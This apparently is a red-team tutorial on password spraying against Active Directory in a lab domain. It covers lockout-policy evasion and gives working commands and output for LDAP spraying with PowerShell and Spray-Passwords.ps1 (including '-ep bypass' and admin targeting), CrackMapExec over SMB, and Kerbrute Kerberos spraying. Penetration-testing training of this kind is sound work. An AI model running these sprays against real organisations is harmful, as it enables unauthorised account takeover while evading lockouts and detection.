In earlier modules, we explored password attacks against network services and hashed credentials. Now, we move into a far more common and realistic enterprise target: Active Directory (AD). From a red team perspective, AD password attacks are not about speed or brute force. They are about patience, stealth, and understanding domain policies.
This section focuses on password spraying attacks—a technique widely used by attackers to identify weak passwords across many domain users without triggering security controls.
Understanding Account Lockout Policies
Before launching any authentication-based attack in Active Directory, one concept must be clearly understood: account lockout policy.
Unlike offline attacks, online authentication attempts are monitored. Too many failed logins can:
- Lock the target account
- Prevent further testing
- Trigger alerts to administrators and security monitoring systems
Viewing Domain Account Policies
To understand these limits, we can inspect the local or domain account policy using PowerShell:
PS C:\Users\john> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
The command completed successfully.Interpreting the Results
Key values from an attacker’s perspective:
- Lockout threshold: 5
This means the account locks after 5 failed attempts. To stay safe, we should attempt no more than 4 failures per user. - Lockout observation window: 30 minutes
After 30 minutes without failures, the counter resets.
When used carefully, this allows us to perform password spraying over time. By spacing attempts correctly, an attacker could generate a high number of authentication attempts per day without locking accounts.
What Is Password Spraying?
Instead of testing many passwords against a single user (brute force), password spraying works the other way around:
- Use one common password
- Test it against many users
- Move slowly to avoid lockouts
This approach is effective because:
- Users often reuse weak or predictable passwords
- Lockout policies are per-user, not per-password
- Network defenders often miss low-and-slow attacks
Method 1: Password Spraying via LDAP (ADSI)
This method uses LDAP authentication through PowerShell and the .NET DirectoryEntry class.
How It Works
If valid credentials are supplied, the DirectoryEntry object is created successfully. If the password is incorrect, authentication fails and an error is returned.
Example: Testing Credentials with LDAP
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry(
$SearchString,
"pete",
"Nexus123!"
)
If the username and password are valid, the object is created. If not, authentication fails.
Automating the Attack
Using this technique, we can build a PowerShell script that:
- Enumerates all domain users
- Respects lockout thresholds and timing
- Performs controlled password spraying
An example tool is:
https://github.com/michele-dedonno/MDD-scripts/blob/master/Spray-Passwords.ps1
Spray-Passwords.ps1
Example Usage
PS C:\> powershell -ep bypass
PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
Output:
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'pete' = 'Nexus123!'
Guessed password for user: 'jen' = 'Nexus123!'
Users guessed are:
'pete' with password: 'Nexus123!'
'jen' with password: 'Nexus123!'
Key Options
-Pass: Test a single password against all users-File: Provide a list of passwords-Admin: Include administrative accounts in the attack
This approach is relatively quiet and well-suited for internal red team operations.
Method 2: Password Spraying via SMB
In this method, authentication attempts are made over SMB.
Tool: CrackMapExec
CrackMapExec is commonly used for lateral movement and credential testing. Here, it is used for password spraying.
Example Command
kali@kali:~$ crackmapexec smb 192.168.50.75 \
-u users.txt \
-p 'Nexus123!' \
-d corp.com \
--continue-on-success
Example output:
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\jen:Nexus123!
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\pete:Nexus123!
Important Considerations
- Each authentication attempt requires a full SMB connection
- This generates high network traffic
- The attack is slow and very noisy
- CrackMapExec does not check password policies
Because of this, attackers must carefully manage timing to avoid account lockouts.
Note: If a compromised user has administrative privileges on the target system, CrackMapExec marks it as Pwn3d! in the output.
Method 3: Password Spraying via Kerberos (TGT Requests)
This method focuses on Kerberos authentication, specifically requesting a Ticket Granting Ticket (TGT).
Why This Method Is Powerful
- Only two UDP packets are used per attempt
- No full session is established
- Extremely fast and stealthy
- Ideal for large-scale spraying
If the username and password are valid, the domain controller responds with a TGT.
Tool: Kerbrute
Kerbrute is a cross-platform tool designed for Kerberos-based attacks.
Example Command
PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray `
-d corp.com `
.\usernames.txt `
"Nexus123!"
The usernames.txt file must be saved with ANSI encoding, or Kerbrute may fail to process it correctly.